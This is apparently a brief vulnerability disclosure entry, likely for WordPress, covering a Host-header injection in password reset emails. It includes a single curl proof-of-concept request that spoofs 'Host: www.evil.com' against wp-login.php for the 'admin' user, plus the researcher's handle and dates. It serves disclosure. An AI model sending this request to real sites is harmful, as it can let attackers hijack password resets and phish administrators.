Attacker may be able to set the 'From' email header in password reset emails.
curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://example.com/wp-login.php?action=lostpassword
UNKNOWN
ethicalhack3r
No
2017-05-03 (about 5 years ago)
2017-05-05 (about 5 years ago)
2020-09-22 (about 2 years ago)